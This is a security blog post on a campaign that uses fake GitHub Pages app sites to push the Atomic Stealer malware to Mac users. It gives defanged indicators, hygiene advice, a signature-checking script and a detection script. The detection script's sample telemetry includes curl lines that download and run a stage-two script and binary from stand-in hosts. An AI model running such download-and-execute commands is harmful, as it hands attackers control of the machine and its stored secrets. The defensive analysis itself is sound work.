SEO-Poisoned GitHub Pages Impersonate Popular Apps to Push macOS Atomic Stealer

By Ash K

Summary: A new campaign is abusing GitHub Pages and search-engine poisoning to rank high for queries like “Install <AppName> on Mac.” The pages impersonate well-known software vendors and redirect visitors to a site that instructs them to run a curl | sh one-liner. The final payload is the Atomic Stealer (AMOS) malware for macOS, which targets browser passwords and crypto wallets.

What’s happening

  • Attackers create polished look-alike repositories and host fake websites on GitHub Pages.
  • SEO techniques place these pages near the top of search results for “on Mac/MacBook” download queries.
  • Victims are redirected to a secondary domain that presents a copy-paste terminal command.
  • The command downloads and executes a script which retrieves and launches the AMOS payload.

Why it works

  • Trust leakage: Users equate “GitHub” + high Google rank with legitimacy.
  • UX bypass: A single paste of curl | sh leapfrogs Gatekeeper prompts and quietly chains multiple downloads.
  • Broad branding: The campaign impersonates many vendors (password managers, finance apps, productivity tools), increasing catchment.

Observed TTPs

  • Fake vendor pages on *.github.io with “on-Mac/MacBook” keywords.
  • Fast-flux redirects to temporary domains (redacted with [.]) that host shell scripts.
  • Second-stage download to /tmp, execution of a binary identified as Atomic Stealer.

Potential Indicators (redacted)

Examples for defenders; do not browse:

  • Redirectors: macprograms-pro[.]com/...
  • Second stage: bonoud[.]com/get3/install.sh, .../get3/update
  • Payload behavior: writes to /tmp, touches browser credential stores, attempts wallet file access.

Risk & impact

AMOS steals browser passwords, autofill data, and crypto wallet secrets, enabling account takeover and financial loss. Because the lure brands include password managers and finance apps, the downstream impact can be severe.

What users should do

  • Never run curl | sh from a website. Get installers from the vendor’s official domain or verified GitHub organization only.
  • Check that downloads are signed (.pkg or app bundle) and validate the developer ID.
  • If you pasted a one-liner recently, disconnect, rotate passwords, review wallets, and scan the Mac with reputable security tools.
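The "check that it is signed and validate the Developer ID" step, worked through as an added example (written for this post, not taken from the original article or from any vendor): it parses the text that `codesign -dv --verbose=4 <app>` prints to stderr and compares the signing Team ID against the one the vendor publishes. The sample codesign output, the app name and the Team ID ABCDE12345 are constructed; the `codesign_info` wrapper is hypothetical and only works on macOS.

```python
"""Verify that a downloaded macOS app bundle is signed with the vendor's Developer ID.

Added example: parses the output of `codesign -dv --verbose=4 <app>` (printed to stderr)
and checks the leaf certificate, the chain and the Team ID against an expected value.
"""
import subprocess

# Constructed sample of codesign output for a hypothetical app; not from a real vendor.
SAMPLE_CODESIGN_OUTPUT = """\
Executable=/Applications/ExampleApp.app/Contents/MacOS/ExampleApp
Identifier=com.example.exampleapp
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=4096 flags=0x10000(runtime) hashes=120+7 location=embedded
Signature size=9000
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=1 Jan 2024 at 00:00:00
TeamIdentifier=ABCDE12345
Sealed Resources version=2 rules=13 files=42
"""


def parse_codesign(output):
    """Turn codesign's key=value lines into a dict; Authority lines become an ordered list."""
    info = {"authorities": []}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "Authority":
            info["authorities"].append(value)
        else:
            info[key] = value
    return info


def check_developer_id(info, expected_team_id):
    """Return (ok, reasons). ok only when the leaf certificate is a Developer ID
    Application certificate chaining to Apple Root CA and the Team ID matches."""
    reasons = []
    auths = info["authorities"]
    if not auths:
        reasons.append("no certificate chain: unsigned or ad-hoc signed")
    elif not auths[0].startswith("Developer ID Application:"):
        reasons.append(f"leaf certificate is not a Developer ID certificate: {auths[0]}")
    if "Apple Root CA" not in auths:
        reasons.append("certificate chain does not end at Apple Root CA")
    team = info.get("TeamIdentifier", "<none>")
    if team != expected_team_id:
        reasons.append(f"Team ID {team} does not match expected {expected_team_id}")
    return (not reasons, reasons)


def codesign_info(app_path):
    """Run codesign on macOS and parse its stderr (hypothetical wrapper; macOS only).
    An unsigned bundle makes codesign exit non-zero, reported here as an empty chain."""
    proc = subprocess.run(["codesign", "-dv", "--verbose=4", app_path],
                          capture_output=True, text=True)
    if proc.returncode != 0:
        return {"authorities": [], "error": proc.stderr.strip()}
    return parse_codesign(proc.stderr)


if __name__ == "__main__":
    ok, reasons = check_developer_id(parse_codesign(SAMPLE_CODESIGN_OUTPUT), "ABCDE12345")
    print("OK" if ok else "REJECT: " + "; ".join(reasons))
```

The expected Team ID has to come from the vendor's own site or documentation, not from the download page. `codesign -dv` only displays the signature; to confirm it is intact, also run `codesign --verify --deep --strict` on the bundle and `spctl --assess --type execute` for the Gatekeeper verdict. Installer packages (.pkg) are checked with `pkgutil --check-signature` instead.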

Guidance for security teams

  • Hunt for process chains: curl → bash/sh → file drop in /tmp → outbound connection to a newly seen domain.
  • Block known IOCs and monitor for suspicious GitHub Pages referrals followed by immediate redirects.
  • Educate users: “download only from official vendor domains; never copy/paste terminal commands from download pages.”
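The process-chain hunt in the list above, worked through as an added example (not from the original post): it builds a process tree from sample endpoint events, treats a shell that starts alongside a curl under the same parent as the consumer of a curl pipe, then checks that shell's descendants for a write under /tmp and for a connection to a domain outside a known baseline. The event schema, the baseline domain list and every host, pid and domain are constructed for illustration (the domains are reserved .example names), not taken from any EDR product or real telemetry.

```python
"""Hunt for the curl | sh -> /tmp drop -> new-domain callback chain in process telemetry.

Added example: the telemetry schema (JSON lines with exec, file_write and net_conn events)
and the baseline domain list are constructed for illustration, not taken from any product.
"""
import json
from collections import defaultdict

# Constructed sample telemetry from three hosts; all domains are reserved .example names
# or well-known baselined hosts.
SAMPLE_EVENTS = """
{"ts": 100, "host": "mac-01", "event": "exec", "pid": 500, "ppid": 1, "proc": "zsh"}
{"ts": 101, "host": "mac-01", "event": "exec", "pid": 501, "ppid": 500, "proc": "curl", "cmd": "curl -fsSL https://redirector.example/get3/install.sh"}
{"ts": 101, "host": "mac-01", "event": "exec", "pid": 502, "ppid": 500, "proc": "sh", "cmd": "sh"}
{"ts": 103, "host": "mac-01", "event": "exec", "pid": 503, "ppid": 502, "proc": "curl", "cmd": "curl -o /tmp/update https://redirector.example/get3/update"}
{"ts": 104, "host": "mac-01", "event": "file_write", "pid": 503, "path": "/tmp/update"}
{"ts": 105, "host": "mac-01", "event": "exec", "pid": 504, "ppid": 502, "proc": "update", "cmd": "/tmp/update"}
{"ts": 106, "host": "mac-01", "event": "net_conn", "pid": 504, "dest": "stage2.example"}
{"ts": 200, "host": "mac-02", "event": "exec", "pid": 700, "ppid": 1, "proc": "zsh"}
{"ts": 201, "host": "mac-02", "event": "exec", "pid": 701, "ppid": 700, "proc": "curl", "cmd": "curl -o /tmp/notes.pdf https://docs.github.com/notes.pdf"}
{"ts": 202, "host": "mac-02", "event": "file_write", "pid": 701, "path": "/tmp/notes.pdf"}
{"ts": 202, "host": "mac-02", "event": "net_conn", "pid": 701, "dest": "docs.github.com"}
{"ts": 300, "host": "mac-03", "event": "exec", "pid": 800, "ppid": 1, "proc": "zsh"}
{"ts": 301, "host": "mac-03", "event": "exec", "pid": 801, "ppid": 800, "proc": "curl", "cmd": "curl -fsSL https://raw.githubusercontent.com/org/tool/install.sh"}
{"ts": 301, "host": "mac-03", "event": "exec", "pid": 802, "ppid": 800, "proc": "bash", "cmd": "bash"}
{"ts": 303, "host": "mac-03", "event": "file_write", "pid": 802, "path": "/tmp/tool-install.log"}
{"ts": 304, "host": "mac-03", "event": "net_conn", "pid": 802, "dest": "github.com"}
"""

# Domains the fleet is already known to talk to (constructed baseline).
BASELINE_DOMAINS = {"github.com", "raw.githubusercontent.com", "docs.github.com"}
SHELLS = {"sh", "bash", "zsh"}
TMP_PREFIXES = ("/tmp/", "/private/tmp/")
PIPE_WINDOW = 5  # seconds: curl and the shell that consumes its output start almost together


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def descendants(root_pid, children):
    """All pids in the process subtree rooted at root_pid, root included."""
    seen, stack = set(), [root_pid]
    while stack:
        pid = stack.pop()
        if pid not in seen:
            seen.add(pid)
            stack.extend(children.get(pid, ()))
    return seen


def hunt(events):
    """Return one finding per shell that looks like the consumer of a curl pipe,
    scored by how many stages of the chain its subtree completed."""
    findings = []
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        execs = [e for e in evs if e["event"] == "exec"]
        children = defaultdict(list)
        for e in execs:
            children[e["ppid"]].append(e["pid"])
        for sh in execs:
            if sh["proc"] not in SHELLS:
                continue
            # Stage 1: `curl ... | sh` forks curl and sh as siblings under the same parent.
            piped = [c for c in execs if c["proc"] == "curl" and c["ppid"] == sh["ppid"]
                     and abs(c["ts"] - sh["ts"]) <= PIPE_WINDOW]
            if not piped:
                continue
            subtree = descendants(sh["pid"], children)
            later = [e for e in evs if e["pid"] in subtree and e["ts"] >= sh["ts"]]
            # Stage 2: something in the shell's subtree drops a file under /tmp.
            drops = [e["path"] for e in later
                     if e["event"] == "file_write" and e["path"].startswith(TMP_PREFIXES)]
            # Stage 3: something in the subtree reaches a domain outside the baseline.
            new_dests = [e["dest"] for e in later
                         if e["event"] == "net_conn" and e["dest"] not in BASELINE_DOMAINS]
            stages = ["curl_pipe_sh"]
            if drops:
                stages.append("tmp_drop")
            if new_dests:
                stages.append("new_domain_beacon")
            findings.append({
                "host": host, "shell_pid": sh["pid"], "curl_cmd": piped[0].get("cmd", ""),
                "stages": stages, "drops": drops, "destinations": new_dests,
                "severity": {1: "low", 2: "medium", 3: "high"}[len(stages)],
            })
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_EVENTS)):
        print(f["severity"].upper(), f["host"], " -> ".join(f["stages"]), f["curl_cmd"])
```

Real events would come from an EDR or the macOS Endpoint Security framework, but the shape of the chain is the same: an interactive shell forks both sides of a pipeline, so curl and the sh that consumes it appear as siblings. A plain curl download (mac-02) produces no finding, and a curl | bash that only talks to baselined domains (mac-03) scores medium; the connection to a domain the fleet has never seen is what lifts mac-01 to high and separates this campaign's chain from routine installs.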

Bottom line

This is a textbook example of attackers weaponizing trusted platforms and search ranking. A single copy-paste can defeat UX guardrails on macOS—so reinforce your download hygiene and block one-liner install patterns across the fleet.

Ash K
Ashton is a seasoned cybersecurity professional with over 25 years of experience in cybersecurity research, incident response, and product and security-solution architecture.